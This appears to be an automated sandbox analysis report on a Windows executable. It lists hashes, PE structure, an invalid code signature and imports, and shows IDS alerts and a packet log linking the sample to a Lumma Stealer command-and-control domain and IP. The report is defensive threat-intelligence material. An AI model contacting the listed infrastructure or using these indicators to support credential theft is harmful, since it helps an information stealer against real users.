                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="392975" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1835008
                Entropy (8bit):4.42177513978557
                Encrypted:false
                SSDEEP:6144:lSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNc0uhiTw:svloTMW+EZMM6DFyG03w
                MD5:E97F9E0CFB511850F2BE57E438CB8E99
                SHA1:6C56D60BA4B10F83F73A4A7CA1090C4DB6B3F84D
                SHA-256:DDFCB9F302309B0CF8344E4D2FA7DD6D74271448FF5A01E61363D23B8BD17CCD
                SHA-512:FF8C28186D74BCAD6481458A9973A0C02D9DE079386538777A72575B92D9E151323224D20570B0928A80716BEE33D5D7F1E195BDEA6E328014253DC12D36824D
                Malicious:false
                Reputation:low
                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..T.I.................................................................................................................................................................................................................................................................................................................................................B.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.568469104991779
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:6RVmzn1DzL.exe
                File size:587'168 bytes
                MD5:4d73427dc0b9f3dc4b846ace0ddc2deb
                SHA1:43b8ffa09826c21676d759c0f3dc2088c4df4efe
                SHA256:0d7b87b394b0620f352a3dd9391b202ff85c2659a007b74caf11799fc51e1e09
                SHA512:b66b5b2beeec4174ff9f644b105c10e757e18211a55b7c5b5d9ed9745c0cdc191f7c427d00518cab63427d92d9122922de92db3d448a6ef347f5c5e778d5067f
                SSDEEP:12288:GGbKDjKEJZALcCAgqW++rNWq3nmK6JqpJjAsE:G1K8Z4cCPqW+kAqrjjjAx
                TLSH:3EC4D059B6D0C4F1D5F70233ACF3872D6AA6BCA2CF34904E239677492C316528A26777
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........?.F`Q.F`Q.F`Q.....R`Q......`Q.K2..O`Q.K2..E`Q.K2..S`Q.O...G`Q......`Q.O...U`Q.F`P..`Q.....@`Q.K2..G`Q.....G`Q.RichF`Q........
                Icon Hash:221266d6b2b692b6
                Entrypoint:0x40f4c2
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x667209E7 [Tue Jun 18 22:27:51 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:aff40d5954acc9dc8618ed5e4332d20d
                Signature Valid:false
                Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                Signature Validation Error:The digital signature of the object did not verify
                Error Number:-2146869232
                Not Before, Not After
                • 19/09/2022 16:03:13 29/08/2025 16:53:42
                Subject Chain
                • OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization, CN="Yubi Software (Linyi) Co., Ltd.", SERIALNUMBER=91371300MABX6G2P0P, O="Yubi Software (Linyi) Co., Ltd.", L=Linyi, C=CN
                Version:3
                Thumbprint MD5:AC766C00A8E56B85549080A0FF03B1C6
                Thumbprint SHA-1:0EBC26DC13DA9132A1E41632E63373C093094565
                Thumbprint SHA-256:1CA87CE957E83D323EEE91CD0B2624A0B7C2578EAA410CDA17E6DCA46CAA0774
                Serial:1397F7A664D0A258D2FCD6A646AD1A52
                Instruction
                call 00007F220C6E9E58h
                jmp 00007F220C6E5065h
                push 00000010h
                push 0042C5D8h
                call 00007F220C6E8B7Dh
                call 00007F220C6E8DE3h
                movzx esi, ax
                push 00000002h
                call 00007F220C6E9DF2h
                pop ecx
                call 00007F220C6E95D0h
                test eax, eax
                jne 00007F220C6E506Ah
                push 0000001Ch
                call 00007F220C6E511Bh
                pop ecx
                call 00007F220C6E952Ch
                test eax, eax
                jne 00007F220C6E506Ah
                push 00000010h
                call 00007F220C6E510Ah
                pop ecx
                call 00007F220C6E9EACh
                and dword ptr [ebp-04h], 00000000h
                call 00007F220C6E95BAh
                test eax, eax
                jns 00007F220C6E506Ah
                push 0000001Bh
                call 00007F220C6E50F0h
                pop ecx
                call dword ptr [00422158h]
                mov dword ptr [0043271Ch], eax
                call 00007F220C6E9EC7h
                mov dword ptr [004308B0h], eax
                call 00007F220C6E983Fh
                test eax, eax
                jns 00007F220C6E506Ah
                push 00000008h
                call 00007F220C6E870Ch
                pop ecx
                call 00007F220C6E9A6Eh
                test eax, eax
                jns 00007F220C6E506Ah
                push 00000009h
                call 00007F220C6E86FBh
                pop ecx
                push 00000001h
                call 00007F220C6E870Dh
                pop ecx
                test eax, eax
                je 00007F220C6E5069h
                push eax
                call 00007F220C6E86E8h
                pop ecx
                call 00007F220C6E9F0Dh
                push esi
                push eax
                push 00000000h
                push 00400000h
                call 00007F220C6D8697h
                mov dword ptr [ebp-20h], eax
                push eax
                call 00007F220C6E8946h
                Programming Language:
                • [ASM] VS2013 UPD5 build 40629
                • [ C ] VS2013 UPD5 build 40629
                • [ASM] VS2013 build 21005
                • [C++] VS2013 build 21005
                • [ C ] VS2013 build 21005
                • [ C ] VS2008 SP1 build 30729
                • [C++] VS2013 UPD5 build 40629
                • [IMP] VS2008 SP1 build 30729
                • [RES] VS2013 build 21005
                • [LNK] VS2013 UPD5 build 40629
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2cc98 | 0xc8 | .rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x33000 | 0x9ee8 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8d800 | 0x1da0 | .reloc
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3d000 | 0x20e4 | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x222e0 | 0x38 | .rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2afc0 | 0x40 | .rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x22000 | 0x28c | .rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x20da0 | 0x20e00 | 578213f60df04180efec215a7f0a35bb | False | 0.6177519011406845 | data | 6.7963959121372595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata | 0x22000 | 0xbaf4 | 0xbc00 | cdc1c6b92591f123cc534d42e4305cbc | False | 0.3902094414893617 | data | 4.720654860732534 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data | 0x2e000 | 0x4720 | 0x2600 | 7aa2770dfdc5d1f3b73ac58c354bf6b0 | False | 0.5197368421052632 | data | 5.33376168230909 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x33000 | 0x9ee8 | 0xa000 | 51f1c315bc5d47d692e1309577fd4585 | False | 0.233837890625 | data | 4.58267390896661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc | 0x3d000 | 0x54400 | 0x54400 | 53d87bacae729e1865703aa3b113122f | False | 0.9501518453264095 | data | 7.994080139780744 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                RT_BITMAP | 0x3b448 | 0x1428 | Device independent bitmap graphic, 80 x 16 x 32, image size 5120, resolution 3779 x 3779 px/m | English | United States | 0.4238372093023256
                RT_ICON | 0x33728 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.15729806329711857
                RT_ICON | 0x37950 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.1928423236514523
                RT_ICON | 0x39ef8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.2621951219512195
                RT_ICON | 0x3afa0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.4725177304964539
                RT_DIALOG | 0x3c870 | 0x266 | data | English | United States | 0.46742671009771986
                RT_DIALOG | 0x3cad8 | 0x134 | data | English | United States | 0.5064935064935064
                RT_GROUP_ICON | 0x3b408 | 0x3e | data | English | United States | 0.8225806451612904
                RT_VERSION | 0x3cc10 | 0x2d8 | data | English | United States | 0.48214285714285715
                RT_MANIFEST | 0x33280 | 0x4a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.49580536912751677
                DLL | Import
                KERNEL32.dll | GetFileSizeEx, GetProcAddress, GetModuleHandleW, GetPrivateProfileStringW, GetPrivateProfileIntW, SetEnvironmentVariableA, SetEndOfFile, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, SetStdHandle, LCMapStringW, CompareStringW, GetStringTypeW, OutputDebugStringW, LoadLibraryExW, WritePrivateProfileStringW, MultiByteToWideChar, GetLastError, CreateMutexW, LocalFree, GetCurrentDirectoryW, LocalAlloc, GetCommandLineW, GlobalFree, CloseHandle, MulDiv, lstrcatW, GetFullPathNameW, lstrcpyW, lstrlenW, GetModuleFileNameW, GetUserDefaultLangID, GetConsoleCP, GetTimeZoneInformation, ReadConsoleW, GetConsoleMode, LeaveCriticalSection, EnterCriticalSection, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetCurrentProcessId, GetStdHandle, HeapAlloc, GetProcessHeap, GetCurrentProcess, WaitForSingleObject, WriteFile, ReadFile, CreateProcessW, CreateFileW, GetVersionExW, FindClose, GetModuleFileNameA, CreateDirectoryW, GetFileAttributesW, FindFirstFileW, FindNextFileW, HeapReAlloc, HeapFree, lstrcmpW, WideCharToMultiByte, IsDebuggerPresent, IsProcessorFeaturePresent, GetCommandLineA, GetSystemTimeAsFileTime, RaiseException, RtlUnwind, InterlockedDecrement, ExitProcess, GetModuleHandleExW, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount, Sleep, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, InterlockedIncrement, GetCurrentThreadId, DeleteCriticalSection, GetFileType, CreateThread
                USER32.dll | SetWindowPos, LoadImageW, EnumWindows, GetWindowTextW, EndDialog, SetForegroundWindow, PostMessageW, KillTimer, SetTimer, SetWindowLongW, GetDlgItemTextW, ShowWindow, IsIconic, wsprintfW, EnableWindow, GetMenu, GetSubMenu, MessageBoxW, DialogBoxParamW, DestroyMenu, TrackPopupMenu, GetWindowLongW, InsertMenuItemW, CheckMenuRadioItem, InsertMenuW, CreatePopupMenu, GetMessagePos, LoadIconW, SetWindowTextW, SendMessageW, GetDlgItem, SetDlgItemTextW
                GDI32.dll | DeleteObject, CreateFontIndirectW, GetObjectW, SetBkMode
                COMDLG32.dll | GetSaveFileNameW
                COMCTL32.dll | ImageList_LoadImageW, ImageList_Draw
                ADVAPI32.dll | RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, RegOpenKeyExW, RegCloseKey, RegOpenKeyW
                SHELL32.dll | SHGetFolderPathW, DragQueryFileW, DragFinish, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteW, CommandLineToArgvW, DragAcceptFiles
                ole32.dll | CoUninitialize, CoCreateInstance, CoInitialize, CoTaskMemFree
                SHLWAPI.dll | PathCanonicalizeW, PathCombineW, PathIsRelativeW
                Language of compilation system | Country where language is spoken | Map
                English | United States |
                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                07/02/24-08:32:58.581071 | TCP | 2054181 | ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                07/02/24-08:32:52.825231 | TCP | 2054181 | ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                07/02/24-08:33:01.124383 | TCP | 2054181 | ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                07/02/24-08:33:03.978479 | TCP | 2054181 | ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                07/02/24-08:32:51.867332 | UDP | 2054180 | ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (contintnetksows .shop) | 62670 | 53 | 192.168.2.5 | 1.1.1.1
                07/02/24-08:32:55.875122 | TCP | 2054181 | ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                07/02/24-08:32:54.529233 | TCP | 2054181 | ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                07/02/24-08:32:51.904360 | TCP | 2054181 | ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                07/02/24-08:32:56.961593 | TCP | 2054181 | ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                07/02/24-08:32:59.582392 | TCP | 2054181 | ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jul 2, 2024 08:32:51.902865887 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:51.902915955 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:51.902996063 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:51.904360056 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:51.904393911 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.386466980 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.386542082 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.392328978 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.392342091 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.392667055 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.448009968 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.448585987 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.448602915 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.448755980 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.816215992 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.816312075 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.816400051 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.818577051 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.818599939 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.818613052 CEST | 49707 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.818619013 CEST | 443 | 49707 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.824717999 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.824765921 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:52.824906111 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.825231075 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:52.825247049 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.301256895 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.301407099 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.302980900 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.302988052 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.303219080 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.304645061 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.304658890 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.304708004 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.989396095 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.989476919 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.989506960 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.989550114 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.989561081 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.989572048 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.989630938 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.989665985 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.989665985 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.989681959 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.989837885 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.989948034 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.989955902 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.990312099 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.990437031 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.990446091 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.994128942 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:53.994189978 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:53.994201899 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:54.041719913 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:54.265539885 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:54.265618086 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:54.265649080 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:54.265733004 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:54.265747070 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:54.265799999 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:54.383409023 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:54.383433104 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:54.383486032 CEST | 49708 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:54.383492947 CEST | 443 | 49708 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:54.528671980 CEST | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:54.528717041 CEST | 443 | 49709 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:54.528812885 CEST | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:54.529232979 CEST | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:54.529247046 CEST | 443 | 49709 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:55.012471914 CEST | 443 | 49709 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:55.012542009 CEST | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:55.013901949 CEST | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:55.013916969 CEST | 443 | 49709 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:55.014153004 CEST | 443 | 49709 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:55.015654087 CEST | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:55.015800953 CEST | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:55.015820980 CEST | 443 | 49709 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:55.698261976 CEST | 443 | 49709 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:55.698365927 CEST | 443 | 49709 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:55.698426008 CEST | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:55.698544979 CEST | 49709 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:55.698565006 CEST | 443 | 49709 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:55.874569893 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:55.874609947 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:55.874736071 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:55.875122070 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:55.875133991 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.346931934 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.347047091 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.348676920 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.348697901 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.348925114 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.350251913 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.350393057 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.350413084 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.350464106 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.350472927 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.757782936 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.757894993 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.758058071 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.758308887 CEST | 49710 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.758333921 CEST | 443 | 49710 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.961066961 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.961106062 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:56.961178064 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.961592913 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:56.961606026 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:57.430356979 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:57.430433989 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:57.432579041 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:57.432590961 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:57.432832003 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:57.434371948 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:57.434415102 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:57.434441090 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:57.434509993 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:57.434520960 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:57.961129904 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:57.961229086 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:57.961390018 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:57.961669922 CEST | 49711 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:57.961687088 CEST | 443 | 49711 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:58.580569983 CEST | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:58.580609083 CEST | 443 | 49712 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:58.580724955 CEST | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:58.581070900 CEST | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:58.581087112 CEST | 443 | 49712 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:59.059777975 CEST | 443 | 49712 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:59.059926987 CEST | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:59.061441898 CEST | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:59.061456919 CEST | 443 | 49712 | 172.67.141.234 | 192.168.2.5
